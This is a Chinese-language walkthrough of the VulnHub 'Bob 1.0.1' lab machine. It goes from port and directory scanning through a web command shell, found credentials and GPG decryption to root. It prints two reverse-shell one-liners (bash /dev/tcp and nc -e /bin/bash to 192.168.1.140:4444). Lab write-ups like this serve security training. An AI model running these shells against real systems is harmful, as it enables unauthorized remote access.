下载地址:https://www.vulnhub.com/entry/bob-101,226/
信息搜集
扫描IP地址
扫描端口及端口信息
访问80端口并没有发现有用的信息
扫描目录
看到有熟悉的robots.txt,访问看一下
发现了dev_shell.php,可以执行一些简单的命令,但是不能执行ls,ifconfig,pwd等命令
getshell
bash反弹shell
bash -c 'exec bash -i &>/dev/tcp/192.168.1.140/4444 <&1'
nc发送一个shell到本地
/bin/nc 192.168.1.140 4444 -e /bin/bash查看用户,看到一共有六个用户拥有登录权限
在bob的家目录里的.old_passwordfile.html文件看到了jc用户和seb用户的密码
尝试使用这两个用户登录
这两个用户也没有啥特殊的权限
继续查看bob家目录的文件,从桌面开始找,刚找到Documents就发现了一些小惊喜,login.txt.gpg
既然有GPG密文的文件,肯定会有解密的密钥
查看一下,还有个文件夹Secret,进去继续摸索
一路向下,来到最后一个文件,查看到一个名字为notes.sh的文件
没发现啥有用的信息,执行一下notes.sh这个脚本
仔细观察执行出来的这个结果,发现每一行都有一个大写的字母
将每一行的大写字母都提取出来 HARPOCRATES
回到login.txt.gpg的地方输入密码解密
gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
提权
找到了bob用户的密码,使用bob用户登录,直接sudo su提权到root
成功获取根目录下的flag
到这里成功完成了该靶机!
本文章为转载内容,我们尊重原作者对文章享有的著作权。如有内容错误或侵权问题,欢迎原作者联系我们进行内容更正或删除文章。
